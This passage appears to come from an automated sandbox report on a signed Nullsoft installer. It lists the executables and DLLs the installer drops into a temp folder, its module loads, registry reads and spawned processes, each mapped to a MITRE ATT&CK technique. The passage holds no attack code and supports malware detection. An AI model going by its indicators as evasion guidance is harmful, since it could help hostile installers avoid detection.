\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\PROPSYS.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\DWMAPI.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPTBASE.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter OLEACCRC.DLL (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\OLEACC.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CLBCATQ.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\NTMARTA.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\VERSION.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\SHFOLDER.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\nsnAAD0.tmp\\siblog.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2 (UID: 00000000-00004412)\n \"Sibuia.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2 (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"LoadLibrary\" with a parameter UIAutomationCore.dll (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00002688)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2 (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\VERSION.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.JScript\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.JScript.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\urlmon.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004172)\n \"sibjs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004172)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2\" - [base:0; Status:c0000135]\n \"Sibuia.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2\" - [base:0; Status:c0000135]\n \"Sibuia.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\VERSION.dll\" - [base:0; Status:c0000135]\n \"sibjs.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\urlmon.dll\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-2", "type": 17, "relevance": 10, "name": "The input sample is signed with a valid certificate", "description": "The entire certificate chain of the input sample was validated successfully.", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77590000\n \"Sibuia.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77590000\n \"sibjs.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77590000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"Sibuia.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"Sibuia.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"sibjs.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"sibjs.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"sibjs.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"sibjs.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 69280000\n \"sibjs.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 69A30000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24\" has an executable section named \".text\"\n \"Setup.exe\" has an executable section named \".text\"\n \"Setup.exe\" has an executable section named \".itext\"\n \"Sibuia.exe\" has an executable section named \".text\"\n \"Sibjs.exe\" has an executable section named \".text\"\n \"333.exe\" has an executable section named \".text\"\n \"siblog.dll\" has an executable section named \".text\"\n \"SibClr.dll\" has an executable section named \".text\"\n \"Zip.dll\" has an executable section named \".text\"\n \"039F3.tmp\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24\" has an writable section named \".data\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24\" has an writable section named \".ndata\"\n \"Setup.exe\" has an writable section named \".data\"\n \"Setup.exe\" has an writable section named \".bss\"\n \"Setup.exe\" has an writable section named \".idata\"\n \"Setup.exe\" has an writable section named \".didata\"\n \"Setup.exe\" has an writable section named \".tls\"\n \"Sibuia.exe\" has an writable section named \".data\"\n \"Sibjs.exe\" has an writable section named \".data\"\n \"333.exe\" has an writable section named \".data\"\n \"333.exe\" has an writable section named \".didat\"\n \"siblog.dll\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"Sibuia.exe\" with commandline \"TRUE 111 0\" (UID: 00000000-00002688)\n Spawned process \"sibjs.exe\" with commandline \"TRUE 000 False cond_pkg\" (UID: 00000000-00004172)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"Sibuia.exe\" (UID: 00000000-00002688) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"Sibuia.exe\" (UID: 00000000-00002688) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"Sibuia.exe\" with commandline \"TRUE 111 0\" (UID: 00000000-00002688)\n Spawned process \"sibjs.exe\" with commandline \"TRUE 000 False cond_pkg\" (UID: 00000000-00004172)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".text\" is \"0x274e00\" greater than 0x100000\n Raw size of \".text\" is \"0x1a7600\" greater than 0x100000\n Raw size of \".text\" is \"0x18d800\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24\" was detected as \"Nullsoft Scriptable Install System\" and name: \"Installer\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Setup.exe\" was detected as \"Nullsoft Scriptable Install System\" and name: \"Installer\"\n \"Setup.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Sibuia.exe\" was detected as \"Nullsoft Scriptable Install System\" and name: \"Installer\"\n \"Sibuia.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Sibjs.exe\" was detected as \"Nullsoft Scriptable Install System\" and name: \"Installer\"\n \"Sibjs.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"333.exe\" was detected as \"Nullsoft Scriptable Install System\" and name: \"Installer\"\n \"333.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"siblog.dll\" was detected as \"Nullsoft Scriptable Install System\" and name: \"Installer\"\n \"siblog.dll\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SibClr.dll\" was detected as \"Nullsoft Scriptable Install System\" and name: \"Installer\"\n \"SibClr.dll\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Zip.dll\" was detected as \"Nullsoft Scriptable Install System\" and name: \"Installer\"\n \"Zip.dll\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"039F3.tmp\" was detected as \"Nullsoft Scriptable Install System\" and name: \"Installer\"\n \"039F3.tmp\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n \"Setup.exe\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n \"Sibuia.exe\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n \"Sibjs.exe\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n \"333.exe\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_GUARD_CF\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n \"siblog.dll\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"SibClr.dll\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n \"Zip.dll\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n \"039F3.tmp\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"Sibuia.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"Sibjs.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"333.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"siblog.dll\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"SibClr.dll\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"Zip.dll\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-124", "relevance": 3, "name": "PE file has a big virtual size section", "description": "Virtual size of \".text\" is \"0x274c18\" greater than 0x100000\n Virtual size of \".text\" is \"0x1a7443\" greater than 0x100000\n Virtual size of \".text\" is \"0x18d7f3\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-145", "relevance": 1, "name": "PE file contains large number of import functions", "description": "Observed large number of imported APIs from \"USER32.dll\" : \"224\" [Source: Sibuia.exe]\n Observed large number of imported APIs from \"USER32.dll\" : \"219\" [Source: Sibjs.exe]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"SibClr.dll\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteSubKey\" in \"SibClr.dll\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteValue\" in \"SibClr.dll\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"Setup.exe\" was detected as \"BobSoft Mini Delphi -> BoB / BobSoft\"\n \"Sibuia.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"Sibjs.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"333.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"siblog.dll\" was detected as \"Borland Delphi 3.0 (???)\"\n \"SibClr.dll\" was detected as \"Microsoft visual C# / Basic .NET\"\n \"Zip.dll\" was detected as \"Microsoft visual C# / Basic .NET\"\n \"039F3.tmp\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"sibjs.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"Setup.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\0\\Setup.exe]- [targetUID: 00000000-00002688]\n \"Sibuia.exe\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\Sibuia.exe]- [targetUID: 00000000-00004412]\n \"Sibjs.exe\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\Sibjs.exe]- [targetUID: 00000000-00002688]\n \"Ionic.Zip.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\Ionic.Zip.dll]- [targetUID: 00000000-00004412]\n \"333.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\1\\333.exe]- [targetUID: 00000000-00004412]\n \"siblog.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\nsnAAD0.tmp\\siblog.dll]- [targetUID: 00000000-00004412]\n \"SibClr.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\SibClr.dll]- [targetUID: 00000000-00004172]\n \"Zip.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\Zip.dll]- [targetUID: 00000000-00004412]\n \"039F3.tmp\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\039F3.tmp]- [targetUID: 00000000-00004412]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\0\\Setup.exe\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\1\\333.exe\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibuia.exe\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibjs.exe\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file 